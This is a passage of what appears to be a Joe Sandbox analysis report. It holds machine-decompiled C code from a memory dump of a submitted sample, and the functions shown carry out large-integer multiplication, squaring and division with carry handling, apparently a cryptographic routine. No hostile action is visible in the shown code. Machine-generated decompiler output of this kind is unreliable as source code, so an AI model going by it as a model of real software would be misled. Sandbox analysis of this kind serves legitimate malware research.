    															_t523 =  *(_t755 - 0x28);
    															_t677 = _t523 & 0x0000ffff;
    															 *(_t755 - 0x30) = _t522 & 0x0000ffff;
    															_t724 = _t522 >> 0x10;
    															_t524 = _t523 >> 0x10;
    															_t678 = _t677 *  *(_t755 - 0x30);
    															 *(_t755 - 0x3c) = _t724;
    															_t525 = _t524 *  *(_t755 - 0x3c);
    															_t726 = _t524 *  *(_t755 - 0x30);
    															_t630 = _t677 * _t724 + _t726;
    															 *(_t755 - 0x30) = _t726;
    															__eflags = _t630 - _t726;
    															if(_t630 < _t726) {
    																_t525 = _t525 + 0x10000;
    																__eflags = _t525;
    															}
    															_t631 = _t630 << 0x10;
    															_t679 = _t678 + _t631;
    															_t526 = _t525 + (_t630 >> 0x10);
    															__eflags = _t679 - _t631;
    															if(_t679 < _t631) {
    																_t526 = _t526 + 1;
    																__eflags = _t526;
    															}
    															_t632 =  *((intOrPtr*)(_t755 - 0x40));
    															while(1) {
    																__eflags = _t526 - _t632;
    																if(__eflags < 0) {
    																	break;
    																}
    																if(__eflags != 0) {
    																	L66:
    																	_t632 = _t632 +  *(_t755 - 0x18);
    																	 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    																	__eflags = _t632 -  *(_t755 - 0x18);
    																	if(_t632 <  *(_t755 - 0x18)) {
    																		break;
    																	}
    																	__eflags = _t679 -  *(_t755 - 0x28);
    																	if(_t679 <  *(_t755 - 0x28)) {
    																		_t526 = _t526 - 1;
    																		__eflags = _t526;
    																	}
    																	_t679 = _t679 -  *(_t755 - 0x28);
    																	__eflags = _t679;
    																	continue;
    																}
    																_t730 =  *(_t755 - 0x10);
    																__eflags = _t679 -  *((intOrPtr*)(_t730 - 8));
    																if(_t679 <=  *((intOrPtr*)(_t730 - 8))) {
    																	break;
    																}
    																goto L66;
    															}
    															L71:
    															_t729 =  *(_t755 - 0x1c);
    															_t528 = E003D6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x20)), _t737);
    															 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
    															 *((intOrPtr*)( *( *(_t755 - 0x20)) + _t737 * 4)) = _t528;
    															_t530 = E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x20)),  *(_t755 - 0x34));
    															__eflags = _t530;
    															if(_t530 == 0) {
    																L74:
    																_t531 =  *(_t755 - 0x10);
    																goto L75;
    															}
    															 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    															_t534 = E003D6FFC( *_t729,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t737);
    															__eflags = _t534;
    															if(_t534 == 0) {
    																goto L74;
    															}
    															_t531 =  *(_t755 - 0x10);
    															 *_t531 =  *_t531 + 1;
    															goto L75;
    														}
    														 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
    														goto L71;
    														L75:
    														 *( *(_t755 - 0x44) + _t531) =  *(_t755 - 0xc);
    														_t173 = _t755 - 0x2c;
    														 *_t173 =  *(_t755 - 0x2c) - 1;
    														__eflags =  *_t173;
    														 *(_t755 - 0x10) = _t531 - 4;
    													} while ( *_t173 != 0);
    													goto L76;
    												}
    											}
    										}
    									}
    									_t542 =  *((intOrPtr*)(_t736 + 4));
    									_t643 =  *(_t558 + 4);
    									__eflags = _t643 - _t542 + 1;
    									if(_t643 > _t542 + 1) {
    										_t732 = _t643 + 1;
    										__eflags = _t643 + 1 -  *((intOrPtr*)(_t558 + 8));
    										if(_t643 + 1 >  *((intOrPtr*)(_t558 + 8))) {
    											_t543 = E003D665B(_t732, _t558);
    										} else {
    											_t543 = _t558;
    										}
    										__eflags = _t543;
    										if(_t543 == 0) {
    											goto L179;
    										} else {
    											 *( *_t558 +  *(_t558 + 4) * 4) =  *( *_t558 +  *(_t558 + 4) * 4) & 0x00000000;
    											_t57 = _t558 + 4;
    											 *_t57 =  *(_t558 + 4) + 1;
    											__eflags =  *_t57;
    											goto L38;
    										}
    									}
    									_t733 = _t542 + 2;
    									__eflags = _t542 + 2 -  *((intOrPtr*)(_t558 + 8));
    									if(_t542 + 2 >  *((intOrPtr*)(_t558 + 8))) {
    										_t545 = E003D665B(_t733, _t558);
    										_t736 =  *(_t755 - 0x1c);
    									} else {
    										_t545 = _t558;
    									}
    									__eflags = _t545;
    									if(_t545 == 0) {
    										goto L179;
    									} else {
    										_t546 =  *(_t558 + 4);
    										while(1) {
    											__eflags = _t546 -  *((intOrPtr*)(_t736 + 4)) + 2;
    											if(_t546 >=  *((intOrPtr*)(_t736 + 4)) + 2) {
    												break;
    											}
    											 *( *_t558 + _t546 * 4) =  *( *_t558 + _t546 * 4) & 0x00000000;
    											_t546 = _t546 + 1;
    											__eflags = _t546;
    										}
    										 *(_t558 + 4) =  *((intOrPtr*)(_t736 + 4)) + 2;
    										goto L38;
    									}
    								}
    							}
    							_t698 =  *(_t755 - 4);
    							_t658 = _t755 - 0x60;
    							if(E003D687A(_t698, _t755 - 0x60) >= 0) {
    								goto L16;
    							}
    							E003D6732(_t698, 0);
    							goto L86;
    						}
    					}
    					if( *((intOrPtr*)( *_t562 + _t413 * 4 - 4)) == 0) {
    						goto L102;
    					}
    					_t562 =  *(_t755 - 4);
    					goto L9;
    				}
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003D9885(void* __eax, void* __ecx, void* __esi) {
    				void* _t331;
    				unsigned int _t332;
    				signed int _t333;
    				void* _t338;
    				void* _t340;
    				void* _t341;
    				void* _t342;
    				signed int _t343;
    				void* _t345;
    				void* _t346;
    				void* _t347;
    				signed int _t348;
    				void* _t350;
    				void* _t351;
    				void* _t352;
    				signed int _t353;
    				signed int _t354;
    				void* _t356;
    				signed int _t358;
    				void* _t360;
    				signed int _t362;
    				signed int _t363;
    				void* _t364;
    				signed int _t366;
    				signed int _t367;
    				void* _t368;
    				signed int _t370;
    				signed int _t371;
    				void* _t372;
    				signed int _t375;
    				signed int _t376;
    				void* _t377;
    				signed int _t379;
    				signed int _t380;
    				void* _t381;
    				signed int _t383;
    				signed int _t384;
    				void* _t385;
    				signed int _t387;
    				void* _t389;
    				signed int _t391;
    				signed int _t392;
    				void* _t393;
    				signed int _t395;
    				signed int _t396;
    				void* _t397;
    				signed int _t400;
    				signed int _t401;
    				void* _t402;
    				signed int _t404;
    				signed int _t405;
    				void* _t406;
    				signed int _t408;
    				void* _t410;
    				signed int _t412;
    				signed int _t413;
    				void* _t414;
    				signed int _t416;
    				signed int _t417;
    				signed int _t418;
    				signed int _t419;
    				void* _t422;
    				void* _t424;
    				intOrPtr _t426;
    				unsigned int _t427;
    				signed int _t428;
    				void* _t430;
    				unsigned int _t433;
    				signed int _t434;
    				void* _t435;
    				unsigned int _t438;
    				signed int _t439;
    				void* _t440;
    				unsigned int _t443;
    				signed int _t444;
    				void* _t445;
    				intOrPtr _t447;
    				unsigned int _t450;
    				signed int _t451;
    				void* _t452;
    				unsigned int _t455;
    				signed int _t456;
    				void* _t457;
    				unsigned int _t460;
    				signed int _t461;
    				void* _t462;
    				intOrPtr _t464;
    				unsigned int _t465;
    				signed int _t466;
    				void* _t468;
    				unsigned int _t471;
    				signed int _t472;
    				void* _t473;
    				unsigned int _t476;
    				signed int _t477;
    				void* _t478;
    				intOrPtr _t480;
    				unsigned int _t483;
    				signed int _t484;
    				void* _t485;
    				unsigned int _t488;
    				signed int _t489;
    				void* _t490;
    				intOrPtr _t492;
    				unsigned int _t493;
    				signed int _t494;
    				void* _t496;
    				unsigned int _t499;
    				signed int _t500;
    				void* _t501;
    				intOrPtr _t503;
    				unsigned int _t506;
    				signed int _t507;
    				signed int _t508;
    				intOrPtr _t510;
    				signed int _t512;
    				signed int _t513;
    				signed int _t516;
    				signed int _t518;
    				signed int _t521;
    				signed int _t523;
    				signed int _t526;
    				signed int _t528;
    				signed int _t531;
    				signed int _t533;
    				signed int _t536;
    				signed int _t538;
    				signed int _t541;
    				signed int _t543;
    				signed int _t548;
    				signed int _t550;
    				signed int _t553;
    				signed int _t555;
    				signed int _t558;
    				signed int _t560;
    				signed int _t563;
    				signed int _t565;
    				signed int _t570;
    				signed int _t572;
    				signed int _t575;
    				signed int _t577;
    				void* _t581;
    				void* _t582;
    				intOrPtr _t583;
    				void* _t585;
    				unsigned int _t587;
    				signed int _t588;
    				signed int _t589;
    				signed int _t590;
    				void* _t591;
    				signed int _t592;
    				signed int _t593;
    				void* _t594;
    				signed int _t595;
    				signed int _t596;
    				void* _t597;
    				signed int _t598;
    				signed int _t599;
    				void* _t600;
    				signed int _t601;
    				signed int _t602;
    				void* _t603;
    				signed int _t604;
    				signed int _t605;
    				void* _t606;
    				unsigned int _t608;
    				signed int _t609;
    				signed int _t610;
    				signed int _t611;
    				void* _t612;
    				signed int _t613;
    				signed int _t614;
    				void* _t615;
    				signed int _t616;
    				signed int _t617;
    				void* _t618;
    				signed int _t619;
    				signed int _t620;
    				void* _t621;
    				unsigned int _t623;
    				signed int _t624;
    				signed int _t625;
    				signed int _t626;
    				void* _t627;
    				signed int _t628;
    				signed int _t629;
    				void* _t630;
    				signed int _t631;
    				void* _t633;
    
    				_t585 = __esi;
    				_t356 = __ecx;
    				_t331 = __eax;
    				_t424 = __ecx;
    				if( *(_t633 - 4) < __esi) {
    					_t424 = __ecx + 1;
    				}
    				_t340 =  *(_t633 - 0xc) + _t424;
    				if(_t340 < _t424) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				_t426 =  *(_t633 - 4) + _t585;
    				if(_t426 < _t585) {
    					_t356 = _t356 + 1;
    				}
    				_t341 = _t340 + _t356;
    				if(_t341 < _t356) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x1c)) = _t426;
    				_t427 =  *(_t331 + 0x10);
    				_t358 = _t427 & 0x0000ffff;
    				_t428 = _t427 >> 0x10;
    				_t587 = _t358 * _t428;
    				_t588 = _t587 << 0x11;
    				_t360 = _t358 * _t358 + _t588;
    				_t430 = _t428 * _t428 + (_t587 >> 0xf);
    				if(_t360 < _t588) {
    					_t430 = _t430 + 1;
    				}
    				_t342 = _t341 + _t360;
    				if(_t342 < _t360) {
    					_t430 = _t430 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t430;
    				if( *(_t633 - 8) < _t430) {
    					 *(_t633 - 4) = 1;
    				}
    				_t516 =  *(_t331 + 0xc) & 0x0000ffff;
    				_t589 =  *(_t331 + 0x14) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
    				_t362 =  *(_t331 + 0x16) & 0x0000ffff;
    				_t590 = _t589 * _t516;
    				 *(_t633 - 0x14) = _t516;
    				_t363 = _t362 *  *(_t633 - 0x10);
    				_t518 = _t362 *  *(_t633 - 0x14);
    				_t433 = _t589 *  *(_t633 - 0x10) + _t518;
    				if(_t433 < _t518) {
    					_t363 = _t363 + 0x10000;
    				}
    				_t434 = _t433 << 0x10;
    				_t591 = _t590 + _t434;
    				_t364 = _t363 + (_t433 >> 0x10);
    				if(_t591 < _t434) {
    					_t364 = _t364 + 1;
    				}
    				_t343 = _t342 + _t591;
    				_t435 = _t364;
    				 *(_t633 - 0xc) = _t343;
    				if(_t343 < _t591) {
    					_t435 = _t364 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t435;
    				if( *(_t633 - 8) < _t435) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t591;
    				if( *(_t633 - 0xc) < _t591) {
    					_t364 = _t364 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t364;
    				if( *(_t633 - 8) < _t364) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t521 =  *(_t331 + 8) & 0x0000ffff;
    				_t592 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
    				_t366 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t593 = _t592 * _t521;
    				 *(_t633 - 0x14) = _t521;
    				_t367 = _t366 *  *(_t633 - 0x10);
    				_t523 = _t366 *  *(_t633 - 0x14);
    				_t438 = _t592 *  *(_t633 - 0x10) + _t523;
    				if(_t438 < _t523) {
    					_t367 = _t367 + 0x10000;
    				}
    				_t439 = _t438 << 0x10;
    				_t594 = _t593 + _t439;
    				_t368 = _t367 + (_t438 >> 0x10);
    				if(_t594 < _t439) {
    					_t368 = _t368 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
    				_t440 = _t368;
    				if( *(_t633 - 0xc) < _t594) {
    					_t440 = _t368 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t440;
    				if( *(_t633 - 8) < _t440) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
    				if( *(_t633 - 0xc) < _t594) {
    					_t368 = _t368 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t368;
    				if( *(_t633 - 8) < _t368) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t526 =  *(_t331 + 4) & 0x0000ffff;
    				_t595 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 6) & 0x0000ffff;
    				_t370 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t596 = _t595 * _t526;
    				 *(_t633 - 0x14) = _t526;
    				_t371 = _t370 *  *(_t633 - 0x10);
    				_t528 = _t370 *  *(_t633 - 0x14);
    				_t443 = _t595 *  *(_t633 - 0x10) + _t528;
    				if(_t443 < _t528) {
    					_t371 = _t371 + 0x10000;
    				}
    				_t444 = _t443 << 0x10;
    				_t597 = _t596 + _t444;
    				_t372 = _t371 + (_t443 >> 0x10);
    				if(_t597 < _t444) {
    					_t372 = _t372 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t597;
    				_t445 = _t372;
    				if( *(_t633 - 0xc) < _t597) {
    					_t445 = _t372 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t445;
    				if( *(_t633 - 8) < _t445) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t447 =  *(_t633 - 0xc) + _t597;
    				if(_t447 < _t597) {
    					_t372 = _t372 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t372;
    				if( *(_t633 - 8) < _t372) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x20)) = _t447;
    				_t531 =  *(_t331 + 8) & 0x0000ffff;
    				_t598 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
    				_t375 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t599 = _t598 * _t531;
    				 *(_t633 - 0x14) = _t531;
    				_t376 = _t375 *  *(_t633 - 0x10);
    				_t533 = _t375 *  *(_t633 - 0x14);
    				_t450 = _t598 *  *(_t633 - 0x10) + _t533;
    				if(_t450 < _t533) {
    					_t376 = _t376 + 0x10000;
    				}
    				_t451 = _t450 << 0x10;
    				_t600 = _t599 + _t451;
    				_t377 = _t376 + (_t450 >> 0x10);
    				if(_t600 < _t451) {
    					_t377 = _t377 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
    				_t452 = _t377;
    				if( *(_t633 - 8) < _t600) {
    					_t452 = _t377 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t452;
    				if( *(_t633 - 4) < _t452) {
    					 *(_t633 - 0xc) = 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
    				if( *(_t633 - 8) < _t600) {
    					_t377 = _t377 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t377;
    				if( *(_t633 - 4) < _t377) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t536 =  *(_t331 + 0xc) & 0x0000ffff;
    				_t601 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
    				_t379 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t602 = _t601 * _t536;
    				 *(_t633 - 0x14) = _t536;
    				_t380 = _t379 *  *(_t633 - 0x10);
    				_t538 = _t379 *  *(_t633 - 0x14);
    				_t455 = _t601 *  *(_t633 - 0x10) + _t538;
    				if(_t455 < _t538) {
    					_t380 = _t380 + 0x10000;
    				}
    				_t456 = _t455 << 0x10;
    				_t603 = _t602 + _t456;
    				_t381 = _t380 + (_t455 >> 0x10);
    				if(_t603 < _t456) {
    					_t381 = _t381 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
    				_t457 = _t381;
    				if( *(_t633 - 8) < _t603) {
    					_t457 = _t381 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t457;
    				if( *(_t633 - 4) < _t457) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
    				if( *(_t633 - 8) < _t603) {
    					_t381 = _t381 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t381;
    				if( *(_t633 - 4) < _t381) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t541 =  *(_t331 + 0x10) & 0x0000ffff;
    				_t604 =  *(_t331 + 0x14) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
    				_t383 =  *(_t331 + 0x16) & 0x0000ffff;
    				_t605 = _t604 * _t541;
    				 *(_t633 - 0x14) = _t541;
    				_t384 = _t383 *  *(_t633 - 0x10);
    				_t543 = _t383 *  *(_t633 - 0x14);
    				_t460 = _t604 *  *(_t633 - 0x10) + _t543;
    				if(_t460 < _t543) {
    					_t384 = _t384 + 0x10000;
    				}
    				_t461 = _t460 << 0x10;
    				_t606 = _t605 + _t461;
    				_t385 = _t384 + (_t460 >> 0x10);
    				if(_t606 < _t461) {
    					_t385 = _t385 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t606;
    				_t462 = _t385;
    				if( *(_t633 - 8) < _t606) {
    					_t462 = _t385 + 1;
    				}
    				_t345 =  *(_t633 - 4) + _t462;
    				if(_t345 < _t462) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t464 =  *(_t633 - 8) + _t606;
    				if(_t464 < _t606) {
    					_t385 = _t385 + 1;
    				}
    				_t346 = _t345 + _t385;
    				if(_t346 < _t385) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x24)) = _t464;
    				_t465 =  *(_t331 + 0x14);
    				_t387 = _t465 & 0x0000ffff;
    				_t466 = _t465 >> 0x10;
    				_t608 = _t387 * _t466;
    				_t609 = _t608 << 0x11;
    				_t389 = _t387 * _t387 + _t609;
    				_t468 = _t466 * _t466 + (_t608 >> 0xf);
    				if(_t389 < _t609) {
    					_t468 = _t468 + 1;
    				}
    				_t347 = _t346 + _t389;
    				if(_t347 < _t389) {
    					_t468 = _t468 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t468;
    				if( *(_t633 - 0xc) < _t468) {
    					 *(_t633 - 8) = 1;
    				}
    				_t548 =  *(_t331 + 0x10) & 0x0000ffff;
    				_t610 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
    				_t391 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t611 = _t610 * _t548;
    				 *(_t633 - 0x14) = _t548;
    				_t392 = _t391 *  *(_t633 - 0x10);
    				_t550 = _t391 *  *(_t633 - 0x14);
    				_t471 = _t610 *  *(_t633 - 0x10) + _t550;
    				if(_t471 < _t550) {
    					_t392 = _t392 + 0x10000;
    				}
    				_t472 = _t471 << 0x10;
    				_t612 = _t611 + _t472;
    				_t393 = _t392 + (_t471 >> 0x10);
    				if(_t612 < _t472) {
    					_t393 = _t393 + 1;
    				}
    				_t348 = _t347 + _t612;
    				_t473 = _t393;
    				 *(_t633 - 4) = _t348;
    				if(_t348 < _t612) {
    					_t473 = _t393 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t473;
    				if( *(_t633 - 0xc) < _t473) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t612;
    				if( *(_t633 - 4) < _t612) {
    					_t393 = _t393 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t393;
    				if( *(_t633 - 0xc) < _t393) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				_t553 =  *(_t331 + 0xc) & 0x0000ffff;
    				_t613 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
    				_t395 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t614 = _t613 * _t553;
    				 *(_t633 - 0x14) = _t553;
    				_t396 = _t395 *  *(_t633 - 0x10);
    				_t555 = _t395 *  *(_t633 - 0x14);
    				_t476 = _t613 *  *(_t633 - 0x10) + _t555;
    				if(_t476 < _t555) {
    					_t396 = _t396 + 0x10000;
    				}
    				_t477 = _t476 << 0x10;
    				_t615 = _t614 + _t477;
    				_t397 = _t396 + (_t476 >> 0x10);
    				if(_t615 < _t477) {
    					_t397 = _t397 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t615;
    				_t478 = _t397;
    				if( *(_t633 - 4) < _t615) {
    					_t478 = _t397 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t478;
    				if( *(_t633 - 0xc) < _t478) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				_t480 =  *(_t633 - 4) + _t615;
    				if(_t480 < _t615) {
    					_t397 = _t397 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t397;
    				if( *(_t633 - 0xc) < _t397) {
    					 *(_t633 - 8) =  *(_t633 - 8) + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x28)) = _t480;
    				_t558 =  *(_t331 + 0x10) & 0x0000ffff;
    				_t616 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
    				_t400 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t617 = _t616 * _t558;
    				 *(_t633 - 0x14) = _t558;
    				_t401 = _t400 *  *(_t633 - 0x10);
    				_t560 = _t400 *  *(_t633 - 0x14);
    				_t483 = _t616 *  *(_t633 - 0x10) + _t560;
    				if(_t483 < _t560) {
    					_t401 = _t401 + 0x10000;
    				}
    				_t484 = _t483 << 0x10;
    				_t618 = _t617 + _t484;
    				_t402 = _t401 + (_t483 >> 0x10);
    				if(_t618 < _t484) {
    					_t402 = _t402 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
    				_t485 = _t402;
    				if( *(_t633 - 0xc) < _t618) {
    					_t485 = _t402 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t485;
    				if( *(_t633 - 8) < _t485) {
    					 *(_t633 - 4) = 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
    				if( *(_t633 - 0xc) < _t618) {
    					_t402 = _t402 + 1;
    				}
    				 *(_t633 - 8) =  *(_t633 - 8) + _t402;
    				if( *(_t633 - 8) < _t402) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t563 =  *(_t331 + 0x14) & 0x0000ffff;
    				_t619 =  *(_t331 + 0x18) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
    				_t404 =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t620 = _t619 * _t563;
    				 *(_t633 - 0x14) = _t563;
    				_t405 = _t404 *  *(_t633 - 0x10);
    				_t565 = _t404 *  *(_t633 - 0x14);
    				_t488 = _t619 *  *(_t633 - 0x10) + _t565;
    				if(_t488 < _t565) {
    					_t405 = _t405 + 0x10000;
    				}
    				_t489 = _t488 << 0x10;
    				_t621 = _t620 + _t489;
    				_t406 = _t405 + (_t488 >> 0x10);
    				if(_t621 < _t489) {
    					_t406 = _t406 + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t621;
    				_t490 = _t406;
    				if( *(_t633 - 0xc) < _t621) {
    					_t490 = _t406 + 1;
    				}
    				_t350 =  *(_t633 - 8) + _t490;
    				if(_t350 < _t490) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				_t492 =  *(_t633 - 0xc) + _t621;
    				if(_t492 < _t621) {
    					_t406 = _t406 + 1;
    				}
    				_t351 = _t350 + _t406;
    				if(_t351 < _t406) {
    					 *(_t633 - 4) =  *(_t633 - 4) + 1;
    				}
    				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
    				 *((intOrPtr*)( *(_t633 + 8) + 0x2c)) = _t492;
    				_t493 =  *(_t331 + 0x18);
    				_t408 = _t493 & 0x0000ffff;
    				_t494 = _t493 >> 0x10;
    				_t623 = _t408 * _t494;
    				_t624 = _t623 << 0x11;
    				_t410 = _t408 * _t408 + _t624;
    				_t496 = _t494 * _t494 + (_t623 >> 0xf);
    				if(_t410 < _t624) {
    					_t496 = _t496 + 1;
    				}
    				_t352 = _t351 + _t410;
    				if(_t352 < _t410) {
    					_t496 = _t496 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t496;
    				if( *(_t633 - 4) < _t496) {
    					 *(_t633 - 0xc) = 1;
    				}
    				_t570 =  *(_t331 + 0x14) & 0x0000ffff;
    				_t625 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
    				_t412 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t626 = _t625 * _t570;
    				 *(_t633 - 0x14) = _t570;
    				_t413 = _t412 *  *(_t633 - 0x10);
    				_t572 = _t412 *  *(_t633 - 0x14);
    				_t499 = _t625 *  *(_t633 - 0x10) + _t572;
    				if(_t499 < _t572) {
    					_t413 = _t413 + 0x10000;
    				}
    				_t500 = _t499 << 0x10;
    				_t627 = _t626 + _t500;
    				_t414 = _t413 + (_t499 >> 0x10);
    				if(_t627 < _t500) {
    					_t414 = _t414 + 1;
    				}
    				_t353 = _t352 + _t627;
    				_t501 = _t414;
    				 *(_t633 - 8) = _t353;
    				if(_t353 < _t627) {
    					_t501 = _t414 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t501;
    				if( *(_t633 - 4) < _t501) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t503 =  *(_t633 - 8) + _t627;
    				if(_t503 < _t627) {
    					_t414 = _t414 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t414;
    				if( *(_t633 - 4) < _t414) {
    					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
    				}
    				_t354 =  *(_t633 + 8);
    				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
    				 *((intOrPtr*)(_t354 + 0x30)) = _t503;
    				_t575 =  *(_t331 + 0x18) & 0x0000ffff;
    				_t628 =  *(_t331 + 0x1c) & 0x0000ffff;
    				 *(_t633 + 8) =  *(_t331 + 0x1a) & 0x0000ffff;
    				_t416 =  *(_t331 + 0x1e) & 0x0000ffff;
    				_t629 = _t628 * _t575;
    				 *(_t633 - 0x14) = _t575;
    				_t417 = _t416 *  *(_t633 + 8);
    				_t577 = _t416 *  *(_t633 - 0x14);
    				_t506 = _t628 *  *(_t633 + 8) + _t577;
    				if(_t506 < _t577) {
    					_t417 = _t417 + 0x10000;
    				}
    				_t507 = _t506 << 0x10;
    				_t630 = _t629 + _t507;
    				_t418 = _t417 + (_t506 >> 0x10);
    				if(_t630 < _t507) {
    					_t418 = _t418 + 1;
    				}
    				 *(_t633 - 4) =  *(_t633 - 4) + _t630;
    				 *(_t633 + 8) = _t418;
    				_t508 = _t418;
    				if( *(_t633 - 4) < _t630) {
    					_t319 = _t418 + 1; // 0x1
    					_t508 = _t319;
    				}
    				_t581 =  *(_t633 - 0xc) + _t508;
    				if(_t581 < _t508) {
    					 *(_t633 - 8) = 1;
    				}
    				_t510 =  *(_t633 - 4) + _t630;
    				_t419 = _t418 + 1;
